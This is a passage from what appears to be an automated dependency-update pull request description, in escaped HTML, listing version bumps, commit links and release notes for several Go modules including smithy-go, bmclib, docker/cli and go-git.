href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.24.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/b860661df961e236ca154f5a66e1f01216639738\"\u003e\u003ccode\u003eb860661\u003c/code\u003e\u003c/a\u003e Release 2026-02-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/567846b9a9de2906faffe420719177aece913452\"\u003e\u003ccode\u003e567846b\u003c/code\u003e\u003c/a\u003e Bump minimun Go version to 1.24 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/629\"\u003e#629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/8c6355875a5c602fa6c2d9093e2b46e69e4d38f4\"\u003e\u003ccode\u003e8c63558\u003c/code\u003e\u003c/a\u003e Release 2026-02-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c6d1144762205b31f9d511b1525eb67b0c4c1e4c\"\u003e\u003ccode\u003ec6d1144\u003c/code\u003e\u003c/a\u003e Create new event stream generator (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/626\"\u003e#626\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f82babd3fee1cc95f6974716ba570c1d4f72e8a1\"\u003e\u003ccode\u003ef82babd\u003c/code\u003e\u003c/a\u003e update Smithy version to 1.67.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/627\"\u003e#627\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/708bee3fd23f247fe0b019ae3fbb9dd7837117bc\"\u003e\u003ccode\u003e708bee3\u003c/code\u003e\u003c/a\u003e move writable and chainwritable up (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/622\"\u003e#622\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/7bfe108d0fa9790e554d201e80faa6b8051569d0\"\u003e\u003ccode\u003e7bfe108\u003c/code\u003e\u003c/a\u003e Add support for OrExpression JMESPath (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/9dbc5b22fed45a861a3782db7642bec232c5b0b3\"\u003e\u003ccode\u003e9dbc5b2\u003c/code\u003e\u003c/a\u003e bump smithy to v1.64.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/71f5bff362491399f8a2cca586c5802eb5a66d70\"\u003e\u003ccode\u003e71f5bff\u003c/code\u003e\u003c/a\u003e Release 2025-12-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c94c177cfcf46095d48a88253899242f5971ae1b\"\u003e\u003ccode\u003ec94c177\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.24.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.3.1+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c2be9ccfc3cf0b4c4c4f0a3d5c91dd759ab21256\"\u003e\u003ccode\u003ec2be9cc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6887\"\u003e#6887\u003c/a\u003e from thaJeztah/29.x_backport_pin_actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/0da6a5121f81387dc7eeba18f928c7e6f3d5cd9d\"\u003e\u003ccode\u003e0da6a51\u003c/code\u003e\u003c/a\u003e ci: pin actions to digests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/6b3ca8fc04d2c5615735f87c41b98d331a0d9fe7\"\u003e\u003ccode\u003e6b3ca8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6884\"\u003e#6884\u003c/a\u003e from thaJeztah/29.x_backport_missing_buildtags\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f47603c2903fcf5c7e7d8734e5bbc0ecdc04efaf\"\u003e\u003ccode\u003ef47603c\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6885\"\u003e#6885\u003c/a\u003e from thaJeztah/29.x_backport_update_actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9709c8fe08f902f0aa41ffffaa00085ab39aecd8\"\u003e\u003ccode\u003e9709c8f\u003c/code\u003e\u003c/a\u003e build(deps): bump docker/metadata-action from 5 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/af45a23fa9a06cb282294054d213b9b0fbae1ac7\"\u003e\u003ccode\u003eaf45a23\u003c/code\u003e\u003c/a\u003e build(deps): bump docker/bake-action from 6 to 7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/bc97f5ac196f4633ffe360cfa2ab831e94dfc6f8\"\u003e\u003ccode\u003ebc97f5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6883\"\u003e#6883\u003c/a\u003e from thaJeztah/29.x_backport_update_go1.25.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/6d71967120b4cdbb556211c7a2514c42dcb2e582\"\u003e\u003ccode\u003e6d71967\u003c/code\u003e\u003c/a\u003e cli/command: add missing \u0026quot;go:build\u0026quot; comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9b51892b8061ff03e91e8aad41e86cad21057272\"\u003e\u003ccode\u003e9b51892\u003c/code\u003e\u003c/a\u003e update to go1.25.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/5927d80c76b3ce5cf782be818922966e8a0d87a3\"\u003e\u003ccode\u003e5927d80\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6844\"\u003e#6844\u003c/a\u003e from vvoland/update-docker\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.17.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca 